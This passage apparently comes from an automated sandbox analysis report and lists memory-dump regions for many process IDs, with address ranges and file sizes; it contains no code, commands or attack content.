
              • memory/1416-81-0x0000000006540000-0x0000000006541000-memory.dmp
                Filesize

                4KB

              • memory/1500-21-0x0000000000000000-mapping.dmp
              • memory/1500-33-0x00000000716A0000-0x0000000071D8E000-memory.dmp
                Filesize

                6.9MB

              • memory/1520-330-0x0000000000000000-mapping.dmp
              • memory/1568-15-0x0000000000000000-mapping.dmp
              • memory/1620-16-0x0000000000000000-mapping.dmp
              • memory/1752-321-0x00000000005C0000-0x00000000005C1000-memory.dmp
                Filesize

                4KB

              • memory/1752-326-0x0000000004C50000-0x0000000004C52000-memory.dmp
                Filesize

                8KB

              • memory/1752-306-0x0000000000000000-mapping.dmp
              • memory/1752-324-0x00000000006A0000-0x00000000006A5000-memory.dmp
                Filesize

                20KB

              • memory/1752-323-0x00000000005D0000-0x00000000005E2000-memory.dmp
                Filesize

                72KB

              • memory/1752-315-0x0000000072F70000-0x000000007365E000-memory.dmp
                Filesize

                6.9MB

              • memory/1752-316-0x0000000000AE0000-0x0000000000AE1000-memory.dmp
                Filesize

                4KB

              • memory/1756-32-0x00000000716A0000-0x0000000071D8E000-memory.dmp
                Filesize

                6.9MB

              • memory/1756-25-0x0000000000000000-mapping.dmp
              • memory/1768-0-0x0000000000000000-mapping.dmp
              • memory/1800-13-0x0000000000000000-mapping.dmp
              • memory/1840-4-0x0000000000000000-mapping.dmp
              • memory/1840-5-0x0000000000000000-mapping.dmp
              • memory/1892-8-0x0000000000000000-mapping.dmp
              • memory/1900-11-0x0000000000000000-mapping.dmp
              • memory/1936-276-0x0000000000000000-mapping.dmp
              • memory/1944-314-0x0000000072F70000-0x000000007365E000-memory.dmp
                Filesize

                6.9MB

              • memory/1944-318-0x0000000000AD0000-0x0000000000AD1000-memory.dmp
                Filesize

                4KB

              • memory/1944-332-0x00000000007B0000-0x00000000007B3000-memory.dmp
                Filesize

                12KB

              • memory/1944-310-0x0000000000000000-mapping.dmp
              • memory/1944-322-0x0000000000550000-0x0000000000551000-memory.dmp
                Filesize

                4KB

              • memory/1944-325-0x0000000000560000-0x0000000000571000-memory.dmp
                Filesize

                68KB

              • memory/2020-18-0x0000000000000000-mapping.dmp
              • memory/2124-187-0x000000000041A684-mapping.dmp
              • memory/2124-189-0x0000000000400000-0x0000000000425000-memory.dmp
                Filesize

                148KB

              • memory/2124-182-0x0000000000400000-0x0000000000425000-memory.dmp
                Filesize

                148KB

              • memory/2192-275-0x0000000000000000-mapping.dmp
              • memory/2208-312-0x0000000000000000-mapping.dmp
              • memory/2212-500-0x0000000000000000-mapping.dmp
              • memory/2212-518-0x0000000000000000-mapping.dmp
              • memory/2212-478-0x0000000000000000-mapping.dmp
              • memory/2212-442-0x0000000000000000-mapping.dmp
              • memory/2212-440-0x0000000000000000-mapping.dmp
              • memory/2212-490-0x0000000000000000-mapping.dmp
              • memory/2212-480-0x0000000000000000-mapping.dmp
              • memory/2212-482-0x0000000000000000-mapping.dmp
              • memory/2212-438-0x0000000000000000-mapping.dmp
              • memory/2212-488-0x0000000000000000-mapping.dmp
              • memory/2212-410-0x0000000000000000-mapping.dmp
              • memory/2212-492-0x0000000000000000-mapping.dmp
              • memory/2212-484-0x0000000000000000-mapping.dmp
              • memory/2212-476-0x0000000000000000-mapping.dmp
              • memory/2212-486-0x0000000000000000-mapping.dmp
              • memory/2212-408-0x0000000000000000-mapping.dmp
              • memory/2212-474-0x0000000000000000-mapping.dmp
              • memory/2212-494-0x0000000000000000-mapping.dmp
              • memory/2212-496-0x0000000000000000-mapping.dmp
              • memory/2212-498-0x0000000000000000-mapping.dmp
              • memory/2212-470-0x0000000000000000-mapping.dmp
              • memory/2212-502-0x0000000000000000-mapping.dmp
              • memory/2212-504-0x0000000000000000-mapping.dmp
              • memory/2212-446-0x0000000000000000-mapping.dmp
              • memory/2212-506-0x0000000000000000-mapping.dmp
              • memory/2212-508-0x0000000000000000-mapping.dmp
              • memory/2212-448-0x0000000000000000-mapping.dmp
              • memory/2212-450-0x0000000000000000-mapping.dmp
              • memory/2212-452-0x0000000000000000-mapping.dmp
              • memory/2212-454-0x0000000000000000-mapping.dmp
              • memory/2212-510-0x0000000000000000-mapping.dmp
              • memory/2212-456-0x0000000000000000-mapping.dmp
              • memory/2212-512-0x0000000000000000-mapping.dmp
              • memory/2212-436-0x0000000000000000-mapping.dmp
              • memory/2212-458-0x0000000000000000-mapping.dmp
              • memory/2212-434-0x0000000000000000-mapping.dmp
              • memory/2212-432-0x0000000000000000-mapping.dmp
              • memory/2212-430-0x0000000000000000-mapping.dmp
              • memory/2212-428-0x0000000000000000-mapping.dmp
              • memory/2212-426-0x0000000000000000-mapping.dmp
              • memory/2212-460-0x0000000000000000-mapping.dmp
              • memory/2212-444-0x0000000000000000-mapping.dmp
              • memory/2212-516-0x0000000000000000-mapping.dmp
              • memory/2212-424-0x0000000000000000-mapping.dmp
              • memory/2212-422-0x0000000000000000-mapping.dmp
              • memory/2212-420-0x0000000000000000-mapping.dmp
              • memory/2212-462-0x0000000000000000-mapping.dmp
              • memory/2212-464-0x0000000000000000-mapping.dmp
              • memory/2212-418-0x0000000000000000-mapping.dmp
              • memory/2212-416-0x0000000000000000-mapping.dmp
              • memory/2212-414-0x0000000000000000-mapping.dmp
              • memory/2212-514-0x0000000000000000-mapping.dmp
              • memory/2212-412-0x0000000000000000-mapping.dmp
              • memory/2212-466-0x0000000000000000-mapping.dmp
              • memory/2212-468-0x0000000000000000-mapping.dmp
              • memory/2212-472-0x0000000000000000-mapping.dmp
              • memory/2212-357-0x00000000000A0000-0x00000000000A1000-memory.dmp
                Filesize

                4KB

              • memory/2212-358-0x0000000000000000-mapping.dmp
              • memory/2212-359-0x0000000000120000-0x0000000000121000-memory.dmp
                Filesize

                4KB

              • memory/2212-360-0x0000000000000000-mapping.dmp
              • memory/2212-362-0x0000000000000000-mapping.dmp
              • memory/2212-364-0x0000000000000000-mapping.dmp
              • memory/2212-366-0x0000000000000000-mapping.dmp
              • memory/2212-368-0x0000000000000000-mapping.dmp
              • memory/2212-370-0x0000000000000000-mapping.dmp
              • memory/2212-372-0x0000000000000000-mapping.dmp
              • memory/2212-374-0x0000000000000000-mapping.dmp
              • memory/2212-376-0x0000000000000000-mapping.dmp
              • memory/2212-378-0x0000000000000000-mapping.dmp
              • memory/2212-380-0x0000000000000000-mapping.dmp
              • memory/2212-382-0x0000000000000000-mapping.dmp
              • memory/2212-384-0x0000000000000000-mapping.dmp
              • memory/2212-386-0x0000000000000000-mapping.dmp
              • memory/2212-388-0x0000000000000000-mapping.dmp
              • memory/2212-390-0x0000000000000000-mapping.dmp
              • memory/2212-392-0x0000000000000000-mapping.dmp
              • memory/2212-394-0x0000000000000000-mapping.dmp
              • memory/2212-396-0x0000000000000000-mapping.dmp
              • memory/2212-398-0x0000000000000000-mapping.dmp
              • memory/2212-400-0x0000000000000000-mapping.dmp
              • memory/2212-402-0x0000000000000000-mapping.dmp
              • memory/2212-404-0x0000000000000000-mapping.dmp
              • memory/2212-406-0x0000000000000000-mapping.dmp
              • memory/2276-194-0x0000000000417A8B-mapping.dmp
              • memory/2336-352-0x00000000026D0000-0x00000000026D1000-memory.dmp
                Filesize

                4KB

              • memory/2336-353-0x0000000005450000-0x0000000005451000-memory.dmp
                Filesize

                4KB

              • memory/2336-351-0x0000000004B10000-0x0000000004B11000-memory.dmp
                Filesize

                4KB

              • memory/2336-350-0x00000000024E0000-0x00000000024E1000-memory.dmp
                Filesize

                4KB

              • memory/2336-349-0x0000000072F70000-0x000000007365E000-memory.dmp
                Filesize

                6.9MB

              • memory/2336-345-0x0000000000000000-mapping.dmp
              • memory/2352-199-0x000000000041A684-mapping.dmp
              • memory/2496-214-0x0000000000400000-0x0000000000493000-memory.dmp
                Filesize

                588KB

              • memory/2496-212-0x000000000043FCC3-mapping.dmp
              • memory/2496-211-0x0000000000400000-0x0000000000493000-memory.dmp
                Filesize

                588KB

              • memory/2508-100-0x0000000000000000-mapping.dmp
              • memory/2508-103-0x00000000716A0000-0x0000000071D8E000-memory.dmp
                Filesize

                6.9MB

              • memory/2508-209-0x0000000000A70000-0x0000000000A7D000-memory.dmp
                Filesize

                52KB

              • memory/2508-104-0x0000000000B70000-0x0000000000B71000-memory.dmp
                Filesize

                4KB

              • memory/2508-202-0x0000000004E80000-0x0000000004F30000-memory.dmp
                Filesize

                704KB

              • memory/2560-298-0x00000000000D0000-0x00000000000D1000-memory.dmp
                Filesize

                4KB

              • memory/2560-297-0x0000000072F70000-0x000000007365E000-memory.dmp
                Filesize

                6.9MB

              • memory/2560-294-0x0000000000000000-mapping.dmp
              • memory/2560-303-0x0000000000320000-0x0000000000321000-memory.dmp
                Filesize

                4KB

              • memory/2560-346-0x0000000000620000-0x0000000000645000-memory.dmp
                Filesize

                148KB

              • memory/2560-344-0x00000000004A0000-0x00000000004C4000-memory.dmp
                Filesize

                144KB

              • memory/2564-109-0x0000000000000000-mapping.dmp
              • memory/2584-113-0x000007FEF6C00000-0x000007FEF6E7A000-memory.dmp
                Filesize

                2.5MB

              • memory/2648-117-0x0000000000000000-mapping.dmp
              • memory/2712-260-0x0000000000000000-mapping.dmp
              • memory/2724-259-0x0000000000000000-mapping.dmp
              • memory/2736-132-0x0000000000000000-mapping.dmp
              • memory/2748-253-0x0000000000000000-mapping.dmp
              • memory/2768-136-0x0000000000000000-mapping.dmp
              • memory/2824-146-0x0000000000000000-mapping.dmp
              • memory/2828-265-0x0000000072CE0000-0x00000000733CE000-memory.dmp
                Filesize

                6.9MB

              • memory/2828-279-0x0000000000380000-0x00000000003A4000-memory.dmp
                Filesize

                144KB

              • memory/2828-262-0x0000000000000000-mapping.dmp
              • memory/2828-266-0x0000000000E30000-0x0000000000E31000-memory.dmp
                Filesize

                4KB

              • memory/2828-268-0x0000000000270000-0x0000000000271000-memory.dmp
                Filesize

                4KB

              • memory/2848-336-0x0000000072F70000-0x000000007365E000-memory.dmp
                Filesize

                6.9MB

              • memory/2848-334-0x0000000000000000-mapping.dmp
              • memory/2848-337-0x0000000000BC0000-0x0000000000BC1000-memory.dmp
                Filesize

                4KB

              • memory/2848-338-0x00000000048C0000-0x00000000048C1000-memory.dmp
                Filesize

                4KB

              • memory/2848-339-0x00000000026A0000-0x00000000026A1000-memory.dmp
                Filesize

                4KB

              • memory/2848-340-0x0000000005420000-0x0000000005421000-memory.dmp
                Filesize

                4KB

              • memory/2852-155-0x0000000000400000-0x0000000000439000-memory.dmp
                Filesize

                228KB

              • memory/2852-173-0x0000000000400000-0x0000000000439000-memory.dmp
                Filesize

                228KB

              • memory/2852-156-0x0000000000417A8B-mapping.dmp
              • memory/2880-162-0x000000000043FCC3-mapping.dmp
              • memory/2880-160-0x0000000000400000-0x0000000000498000-memory.dmp
                Filesize

                608KB

              • memory/2880-167-0x0000000000400000-0x0000000000498000-memory.dmp
                Filesize

                608KB

              • memory/2888-159-0x0000000000000000-mapping.dmp
              • memory/2900-247-0x0000000000000000-mapping.dmp
              • memory/2900-264-0x00000000027A0000-0x00000000027A4000-memory.dmp
                Filesize

                16KB

              • memory/2940-168-0x000000000043FCC3-mapping.dmp
              • memory/2964-252-0x0000000000400000-0x0000000000434000-memory.dmp
                Filesize

                208KB

              • memory/2964-254-0x0000000000417A8B-mapping.dmp
              • memory/2964-256-0x0000000000400000-0x0000000000434000-memory.dmp
                Filesize

                208KB

              • memory/3052-250-0x0000000000000000-mapping.dmp